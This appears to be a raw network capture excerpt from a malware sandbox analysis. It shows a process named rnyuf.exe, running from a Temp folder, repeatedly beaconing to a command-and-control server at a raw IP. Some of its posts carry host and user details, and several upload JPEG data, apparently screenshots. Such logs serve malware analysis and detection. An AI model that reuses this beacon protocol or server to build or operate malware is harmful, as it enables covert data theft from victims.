                                        Aug 29, 2021 22:27:57.047902107 CEST11226OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:57.127475977 CEST11226INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        138192.168.2.44987646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:57.362560987 CEST11227OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----1bad195bce5d33d9229615811163fb23
                                        Host: 46.17.96.36
                                        Content-Length: 111339
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:57.362754107 CEST11227OUTData Raw: 2d 2d 2d 2d 2d 2d 31 62 61 64 31 39 35 62 63 65 35 64 33 33 64 39 32 32 39 36 31 35 38 31 31 31 36 33 66 62 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------1bad195bce5d33d9229615811163fb23Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:57.363157034 CEST11237OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:57.363504887 CEST11240OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:57.395453930 CEST11243OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:57.395536900 CEST11245OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:57.395567894 CEST11248OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:57.395832062 CEST11253OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:57.395888090 CEST11260OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:57.395909071 CEST11265OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:57.427973032 CEST11269OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:57.538789034 CEST11341INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        139192.168.2.44987846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:57.412004948 CEST11266OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:57.490012884 CEST11340INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        14192.168.2.44974946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:14.812544107 CEST2528OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:14.812851906 CEST2528OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:14.813316107 CEST2538OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:14.813824892 CEST2541OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:14.845769882 CEST2546OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:14.845865011 CEST2549OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:14.846278906 CEST2557OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:14.846317053 CEST2561OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:14.846329927 CEST2566OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:14.878238916 CEST2582OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:14.878539085 CEST2585OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:14.988075972 CEST2635INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        140192.168.2.44987946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:58.270724058 CEST11342OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:58.350860119 CEST11342INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        141192.168.2.44988046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:58.355581999 CEST11343OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:58.355848074 CEST11343OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:58.355931044 CEST11353OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:58.355973005 CEST11355OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:58.392261028 CEST11375OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:58.392348051 CEST11378OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:58.392604113 CEST11381OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:58.428735971 CEST11383OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:58.428956032 CEST11394OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:58.428993940 CEST11397OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:58.429251909 CEST11419OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:58.537743092 CEST11454INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        142192.168.2.44988146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:58.540244102 CEST11455OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:58.617230892 CEST11455INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        143192.168.2.44988246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:58.811075926 CEST11456OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:58.887226105 CEST11546INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:58 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        144192.168.2.44988346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:58.811275005 CEST11456OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
